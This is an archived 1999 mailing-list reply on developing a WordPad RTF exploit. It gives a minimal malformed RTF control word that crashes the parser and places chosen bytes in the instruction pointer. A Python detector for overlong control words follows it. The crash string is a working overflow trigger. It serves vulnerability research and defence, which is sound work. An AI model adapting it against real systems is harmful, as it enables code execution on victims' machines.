Vulnerability Development mailing list archives

Re: development of wordpad exploit


From: dlh () ACU CS UMB EDU (Dave Harvill)
Date: Sun, 21 Nov 1999 00:07:54 -0500


On Sat, 20 Nov 1999, Thomas Dullien wrote:

<snip>

For this reason, we first use wordpad to create a simple rtf file, containing any
text you wish. Mine looks like this when viewed in notepad:

;--- snip ;>----------
{\rtf1\ansi\deff0\deftab720{\fonttbl{\f0\fswiss MS Sans Serif;}{\f1\froman\fcharset2 Symbol;}{\f2\froman Times New Roman;}}
{\colortbl\red0\green0\blue0;}
\deflang1031\pard\plain\f2\fs20 HOLA :)
\par }
;--- snap ;>-----------
</snip>

If you're looking for simplicity, I managed with the following:

{rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbcde}

and got 0x45444342 in EIP after crash. Found this to be the minimum to get
bcde in EIP.

-dave

~~~~~~~~~~~~~~~~~~~~~~
dlh () acu cs umb edu
http://www.cs.umb.edu
~~~~~~~~~~~~~~~~~~~~~~
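The reply above shows that a single control word far longer than any legitimate keyword is enough to crash the parser. As an added example (not code from either poster), here is a defender-side check in Python that flags RTF control words exceeding the 32-letter limit from the RTF specification; the two sample documents are constructed here in the shape of the ones quoted in the thread, not copied files.

```python
import re

# The RTF specification caps a control word name at 32 letters. A longer run of
# letters after a backslash cannot be a real keyword, so it is a cheap triage
# signal for files that probe keyword-buffer handling (as in the thread above).
MAX_CONTROL_WORD_LEN = 32

# Control word: backslash, ASCII letters, optional signed numeric parameter.
# Control symbols such as \{ \} \\ \' are a single non-letter and are ignored.
_CONTROL_WORD = re.compile(rb"\\([A-Za-z]+)(-?\d+)?")


def find_overlong_control_words(data: bytes, limit: int = MAX_CONTROL_WORD_LEN):
    """Return (byte offset, word) for every control word longer than `limit`."""
    return [
        (m.start(), m.group(1).decode("ascii"))
        for m in _CONTROL_WORD.finditer(data)
        if len(m.group(1)) > limit
    ]


def is_suspicious_rtf(data: bytes, limit: int = MAX_CONTROL_WORD_LEN) -> bool:
    """True when the document contains at least one overlong control word."""
    return bool(find_overlong_control_words(data, limit))


# Constructed samples: a benign header of the kind WordPad writes, and a
# document with one 44-letter control word (40 letters followed by "bcde").
BENIGN = (
    rb"{\rtf1\ansi\deff0\deftab720{\fonttbl{\f0\fswiss MS Sans Serif;}}"
    rb"\pard\plain\f0\fs20 HOLA :)\par }"
)
OVERLONG = b"{rtf\\" + b"A" * 40 + b"bcde}"

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("overlong", OVERLONG)):
        hits = find_overlong_control_words(doc)
        print(name, "suspicious" if hits else "ok", hits)
```

The same function can be run over attachments at a mail gateway or in a triage script; the threshold is a parameter so a stricter local policy can be applied.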

